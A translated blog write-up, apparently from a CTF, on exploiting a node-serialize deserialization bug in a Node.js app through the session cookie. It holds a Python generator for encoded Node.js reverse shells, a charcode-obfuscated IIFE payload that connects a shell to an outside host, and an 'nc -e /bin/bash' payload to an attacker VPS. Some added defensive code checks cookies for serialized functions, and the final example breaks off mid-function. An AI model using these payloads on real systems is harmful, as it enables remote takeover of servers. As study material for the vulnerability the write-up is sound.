<!DOCTYPE html>
<html lang="en">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="Node.js deserialization vulnerability"/>




  <meta name="keywords" content="nodejs, unserialize, shell, IIFE, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/05/18/nodejs反序列化漏洞/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  










    <title> Node.js deserialization vulnerability - 八一 </title>
  </head>

  <body>

    <div class="container" id="mobile-panel">

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          Node.js deserialization vulnerability
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-05-18
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">Table of Contents</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞代码"><span class="toc-text">Vulnerable code</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反弹shell的脚本"><span class="toc-text">Reverse shell script</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#序列化"><span class="toc-text">Serialization</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#另一种"><span class="toc-text">Another approach</span></a></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>Vulnerability name: Exploiting Node.js deserialization bug for Remote Code Execution <a id="more"></a></p>
<blockquote>
<p>Summary:<br>Untrusted data is passed to <code>unserialize()</code>. Because the library revives serialized functions, supplying a JavaScript object that contains an immediately invoked function expression (IIFE) results in arbitrary code execution as soon as the object is deserialized.</p>
</blockquote>
<h2 id="漏洞代码"><a href="#漏洞代码" class="headerlink" title="Vulnerable code"></a>Vulnerable code</h2><blockquote>
<p><a href="http://pan.baidu.com/s/1i5vDMNb" target="_blank" rel="noopener">Site source code</a> (extraction password: qp6n)<br>This is the user route:</p>
</blockquote>
<figure class="highlight js"><pre><code>router.get('/admin', function(req, res, next) {
    var passwd = config.secret_password;
    var obj = serialize.unserialize(new Buffer(req.cookies.session, 'base64').toString()); // client-controlled cookie goes straight into unserialize()
    res.render('admin', { title: 'Admin area', admin: obj.admin, pass: passwd });
});</code></pre></figure>
<blockquote>
<p>The problem is on the third line: the <code>session</code> cookie is base64-decoded and handed directly to <code>unserialize()</code>, so the application deserializes whatever the client sends.<br>A crafted serialized object placed in that cookie is therefore enough to exploit it.</p>
</blockquote>
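<p>As an added defensive example (not code from the original post or from node-serialize itself), the following Node.js snippet shows how the <code>/admin</code> route above could handle the session cookie without ever calling <code>unserialize()</code>: it parses the cookie as plain JSON, which cannot revive functions, and scans the result for node-serialize's <code>_$$ND_FUNC$$_</code> function marker (and the trailing <code>()</code> that turns it into the IIFE from the summary) so that such requests can be rejected and logged. The <code>admin</code> boolean shape check and the sample cookies are assumptions made for illustration.</p>

```javascript
// Added example (not from the original post or from node-serialize): defensive
// handling of the base64 session cookie that the vulnerable /admin route feeds
// to serialize.unserialize().
//
// node-serialize stores functions as strings prefixed with "_$$ND_FUNC$$_" and
// turns them back into live functions on unserialize(); when such a string ends
// in "()" the function is an IIFE that runs during parsing. The defence is to
// never hand untrusted input to unserialize(): JSON.parse() cannot revive
// functions, and an explicit shape check plus marker scan rejects and flags
// anything unexpected.

const FUNC_MARKER = '_$$ND_FUNC$$_'; // node-serialize's real function prefix

// Decode the cookie the same way the vulnerable route does, but only return the
// raw text; nothing here is evaluated.
function decodeSessionCookie(cookieB64) {
  if (typeof cookieB64 !== 'string' || cookieB64.length === 0) return null;
  return Buffer.from(cookieB64, 'base64').toString('utf8');
}

// Recursively collect every string carrying the function marker, noting whether
// it is wrapped as an IIFE (trailing "()"); usable as a detection signal for
// request logging or a WAF rule.
function findFunctionMarkers(value, path = '$', found = []) {
  if (typeof value === 'string') {
    if (value.startsWith(FUNC_MARKER)) {
      found.push({ path, iife: /\(\s*\)\s*;?\s*$/.test(value) });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findFunctionMarkers(v, `${path}[${i}]`, found));
  } else if (value !== null && typeof value === 'object') {
    for (const [k, v] of Object.entries(value)) {
      findFunctionMarkers(v, `${path}.${k}`, found);
    }
  }
  return found;
}

// Hardened replacement for
//   serialize.unserialize(new Buffer(req.cookies.session, 'base64').toString())
// The /admin route only reads obj.admin, so a single boolean is all we accept
// (assumed shape for this example).
function parseSession(cookieB64) {
  const raw = decodeSessionCookie(cookieB64);
  if (raw === null) return { ok: false, reason: 'missing cookie' };
  let data;
  try {
    data = JSON.parse(raw); // never revives functions, unlike unserialize()
  } catch (e) {
    return { ok: false, reason: 'not JSON' };
  }
  if (data === null || typeof data !== 'object' || Array.isArray(data)) {
    return { ok: false, reason: 'not an object' };
  }
  const markers = findFunctionMarkers(data);
  if (markers.length > 0) {
    // Worth alerting on: a legitimate client never sends serialized functions.
    return { ok: false, reason: 'serialized function in cookie', markers };
  }
  if (typeof data.admin !== 'boolean') {
    return { ok: false, reason: 'admin must be boolean' };
  }
  return { ok: true, session: { admin: data.admin } };
}

// Constructed sample cookies for demonstration (not captured traffic).
function encodeCookie(obj) {
  return Buffer.from(JSON.stringify(obj), 'utf8').toString('base64');
}
const BENIGN_COOKIE = encodeCookie({ admin: false });
// Same shape node-serialize emits for a function, with the IIFE "()" appended;
// the body is inert so the sample is safe to keep in a test suite.
const IIFE_COOKIE = encodeCookie({ rce: FUNC_MARKER + 'function (){ return 1 }()' });

console.log(JSON.stringify(parseSession(BENIGN_COOKIE)));
console.log(JSON.stringify(parseSession(IIFE_COOKIE)));
```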
<h2 id="反弹shell的脚本"><a href="#反弹shell的脚本" class="headerlink" title="Reverse shell script"></a>Reverse shell script</h2><figure class="highlight python"><pre><code>#!/usr/bin/python
# Generator for encoded NodeJS reverse shells
# Based on the NodeJS reverse shell by Evilpacket
# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)
# Insecurety Research (2013) - insecurety.net
import sys
if len(sys.argv) != 3:
    print ("Usage: %s &lt;LHOST&gt; &lt;LPORT&gt;" % (sys.argv[0]))
    sys.exit(0)

IP_ADDR = sys.argv[1]
PORT = sys.argv[2]

def charencode(string):
    """String.CharCode"""
    encoded = ''
    for char in string:
        encoded = encoded + "," + str(ord(char))
    return encoded[1:]

print ("[+] LHOST = %s" % (IP_ADDR))
print ("[+] LPORT = %s" % (PORT))
NODEJS_REV_SHELL = '''
var net = require('net');
var spawn = require('child_process').spawn;
HOST="%s";
PORT="%s";
TIMEOUT="5000";
if (typeof String.prototype.contains === 'undefined') { String.prototype.contains = function(it) { return this.indexOf(it) != -1; }; }
function c(HOST,PORT) {
    var client = new net.Socket();
    client.connect(PORT, HOST, function() {
        var sh = spawn('/bin/sh',[]);
        client.write("Connected!\\n");
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
        sh.on('exit',function(code,signal){
          client.end("Disconnected!\\n");
        });
    });
    client.on('error', function(e) {
        setTimeout(c(HOST,PORT), TIMEOUT);
    });
}
c(HOST,PORT);
''' % (IP_ADDR, PORT)
print ("[+] Encoding")
PAYLOAD = charencode(NODEJS_REV_SHELL)
print ("eval(String.fromCharCode(%s))" % (PAYLOAD))</code></pre></figure>
<h2 id="序列化"><a href="#序列化" class="headerlink" title="Serialization"></a>Serialization</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> y = &#123;</span><br><span class="line">rce : <span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;<span class="built_in">eval</span>(<span class="built_in">String</span>.fromCharCode(<span class="number">10</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">113</span>,<span class="number">117</span>,<span class="number">105</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">113</span>,<span class="number">117</span>,<span 
class="number">105</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">99</span>,<span class="number">104</span>,<span class="number">105</span>,<span class="number">108</span>,<span class="number">100</span>,<span class="number">95</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">101</span>,<span class="number">115</span>,<span class="number">115</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">110</span>,<span class="number">111</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">98</span>,<span class="number">120</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">97</span>,<span class="number">109</span>,<span class="number">46</span>,<span class="number">120</span>,<span class="number">121</span>,<span class="number">122</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">50</span>,<span class="number">51</span>,<span class="number">51</span>,<span class="number">51</span>,<span 
class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">84</span>,<span class="number">73</span>,<span class="number">77</span>,<span class="number">69</span>,<span class="number">79</span>,<span class="number">85</span>,<span class="number">84</span>,<span class="number">61</span>,<span class="number">34</span>,<span class="number">53</span>,<span class="number">48</span>,<span class="number">48</span>,<span class="number">48</span>,<span class="number">34</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">105</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">40</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">111</span>,<span class="number">102</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">116</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">61</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">39</span>,<span class="number">117</span>,<span class="number">110</span>,<span 
class="number">100</span>,<span class="number">101</span>,<span class="number">102</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">100</span>,<span class="number">39</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">32</span>,<span class="number">83</span>,<span class="number">116</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">103</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">121</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">115</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">32</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">117</span>,<span class="number">114</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">116</span>,<span 
class="number">104</span>,<span class="number">105</span>,<span class="number">115</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">79</span>,<span class="number">102</span>,<span class="number">40</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">33</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">45</span>,<span class="number">49</span>,<span class="number">59</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">59</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">10</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span 
class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">119</span>,<span class="number">32</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">83</span>,<span class="number">111</span>,<span class="number">99</span>,<span class="number">107</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span 
class="number">40</span>,<span class="number">41</span>,<span class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">118</span>,<span class="number">97</span>,<span class="number">114</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">32</span>,<span class="number">61</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">119</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">47</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">91</span>,<span class="number">93</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">119</span>,<span class="number">114</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">101</span>,<span 
class="number">40</span>,<span class="number">34</span>,<span class="number">67</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">101</span>,<span class="number">100</span>,<span class="number">33</span>,<span class="number">92</span>,<span class="number">110</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span 
class="number">111</span>,<span class="number">117</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">115</span>,<span class="number">116</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">114</span>,<span class="number">46</span>,<span class="number">112</span>,<span class="number">105</span>,<span class="number">112</span>,<span class="number">101</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">104</span>,<span class="number">46</span>,<span class="number">111</span>,<span class="number">110</span>,<span 
class="number">40</span>,<span class="number">39</span>,<span class="number">101</span>,<span class="number">120</span>,<span class="number">105</span>,<span class="number">116</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">100</span>,<span class="number">101</span>,<span class="number">44</span>,<span class="number">115</span>,<span class="number">105</span>,<span class="number">103</span>,<span class="number">110</span>,<span class="number">97</span>,<span class="number">108</span>,<span class="number">41</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">40</span>,<span class="number">34</span>,<span class="number">68</span>,<span class="number">105</span>,<span class="number">115</span>,<span class="number">99</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">110</span>,<span class="number">101</span>,<span class="number">99</span>,<span class="number">116</span>,<span 
class="number">101</span>,<span class="number">100</span>,<span class="number">33</span>,<span class="number">92</span>,<span class="number">110</span>,<span class="number">34</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">99</span>,<span class="number">108</span>,<span class="number">105</span>,<span class="number">101</span>,<span class="number">110</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">39</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">114</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">39</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">102</span>,<span class="number">117</span>,<span class="number">110</span>,<span class="number">99</span>,<span class="number">116</span>,<span class="number">105</span>,<span class="number">111</span>,<span class="number">110</span>,<span class="number">40</span>,<span class="number">101</span>,<span class="number">41</span>,<span 
class="number">32</span>,<span class="number">123</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">115</span>,<span class="number">101</span>,<span class="number">116</span>,<span class="number">84</span>,<span class="number">105</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">111</span>,<span class="number">117</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">44</span>,<span class="number">32</span>,<span class="number">84</span>,<span class="number">73</span>,<span class="number">77</span>,<span class="number">69</span>,<span class="number">79</span>,<span class="number">85</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">32</span>,<span class="number">125</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>,<span class="number">125</span>,<span class="number">10</span>,<span class="number">99</span>,<span class="number">40</span>,<span class="number">72</span>,<span class="number">79</span>,<span class="number">83</span>,<span class="number">84</span>,<span class="number">44</span>,<span class="number">80</span>,<span 
class="number">79</span>,<span class="number">82</span>,<span class="number">84</span>,<span class="number">41</span>,<span class="number">59</span>,<span class="number">10</span>))&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">var</span> serialize = <span class="built_in">require</span>(<span class="string">'node-serialize'</span>);</span><br><span class="line"><span class="built_in">console</span>.log(<span class="string">"Serialized: \n"</span> + serialize.serialize(y));</span><br></pre></td></tr></table></figure>
<blockquote>
<p>Generate the deserialization payload and append the IIFE parentheses <code>()</code> right after the function body.<br>Why the IIFE parentheses are needed comes down to this code inside unserialize:</p>
</blockquote>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (obj[key].indexOf(<span class="string">'_$$ND_FUNC$$_'</span>) === <span class="number">0</span>) &#123;</span><br><span class="line">  obj[key] = eval(<span class="string">'('</span> + obj[key].substring(<span class="string">'_$$ND_FUNC$$_'</span>.length) + <span class="string">')'</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>An IIFE is JavaScript's Immediately Invoked Function Expression. If we put the IIFE parentheses <code>()</code> after the function body, the function is invoked the moment unserialize rebuilds the object, not later when the application happens to call it.<br>The parentheses that eval adds only turn the text into an expression; it is the trailing <code>()</code> we appended that makes <code>(function(){...}())</code> an IIFE, so eval runs the body on the spot and code execution happens inside unserialize itself.</p>
</blockquote>
<p>After generating the payload, base64-encode it and put it in the cookie, then listen on a port on a VPS to catch the reverse shell (this is the method of a senior student from 淮工; I did the same thing during the competition without success, and after the competition I read his writeup and still could not reproduce it, no idea why... the shell dies as soon as it calls back. Below is his screenshot of it working).</p>
<p><img src="https://s1.ax1x.com/2018/01/01/pSW98e.png" alt="shell"></p>
<h2 id="另一种"><a href="#另一种" class="headerlink" title="另一种"></a>Another payload</h2><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">"rce"</span>:<span class="string">"_$$ND_FUNC$$_function ()&#123;\n</span></span><br><span class="line"><span class="string">require('child_process').exec('nc YOUR_VPS_IP YOUR_VPS_PORT -e /bin/bash', function(error,\nstdout, stderr) &#123; </span></span><br><span class="line"><span class="string">console.log(stdout) &#125;);\n&#125;()"</span>&#125;</span><br></pre></td></tr></table></figure>
<blockquote>
<p>The remaining steps (base64 the JSON, put it in the cookie, listen on the VPS) are the same as above.</p>
</blockquote>
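<p>The following is an added example, not code from the original post or from node-serialize. It re-implements only the <code>_$$ND_FUNC$$_</code> branch quoted above so the mechanism behind both payloads can be run offline: the same function body is deserialized once without and once with the trailing <code>()</code>, a counter stands in for the reverse shell, the payload goes through the base64 cookie round trip described above, and a hardened <code>unserializeSafe</code> shows the only real fix for untrusted input, refusing serialized functions altogether. <code>FUNC_MARKER</code>, <code>unserializeVulnerable</code>, <code>unserializeSafe</code>, <code>toCookie</code>, <code>fromCookie</code>, <code>demo</code> and the <code>__executed</code> counter are names chosen for this example, not the library's.</p>

```javascript
// Added example: minimal re-implementation of the function branch of
// node-serialize's unserialize(), NOT the library itself. Names below are ours.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Vulnerable path: mirrors the eval() line quoted from unserialize.
function unserializeVulnerable(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    if (typeof obj[key] === 'string' && obj[key].indexOf(FUNC_MARKER) === 0) {
      // eval('(' + src + ')') only makes the text an expression. If src ends
      // with "()" the expression is an IIFE and the body runs right here,
      // before the application ever reads obj[key].
      obj[key] = eval('(' + obj[key].substring(FUNC_MARKER.length) + ')');
    }
  }
  return obj;
}

// Hardened path: with untrusted input there is no safe way to revive a
// function, so reject the marker outright instead of eval'ing anything.
function unserializeSafe(json) {
  const obj = JSON.parse(json);
  for (const key of Object.keys(obj)) {
    if (typeof obj[key] === 'string' && obj[key].indexOf(FUNC_MARKER) === 0) {
      throw new Error('refusing to deserialize a function in key "' + key + '"');
    }
  }
  return obj;
}

// Cookie round trip as in the post: base64 of the JSON is the cookie value,
// the server decodes it and hands the JSON to unserialize.
function toCookie(json) { return Buffer.from(json, 'utf8').toString('base64'); }
function fromCookie(b64) { return Buffer.from(b64, 'base64').toString('utf8'); }

// Stand-in for the attacker's side effect (a counter instead of a shell).
globalThis.__executed = 0;
const body = 'function(){ globalThis.__executed += 1; return "ran"; }';
const payloadNoIIFE = JSON.stringify({ rce: FUNC_MARKER + body });        // constructed sample
const payloadIIFE   = JSON.stringify({ rce: FUNC_MARKER + body + '()' }); // constructed sample

function demo() {
  globalThis.__executed = 0;

  // Without "()": eval yields a function object that nothing ever calls.
  const a = unserializeVulnerable(fromCookie(toCookie(payloadNoIIFE)));
  const afterNoIIFE = globalThis.__executed; // still 0
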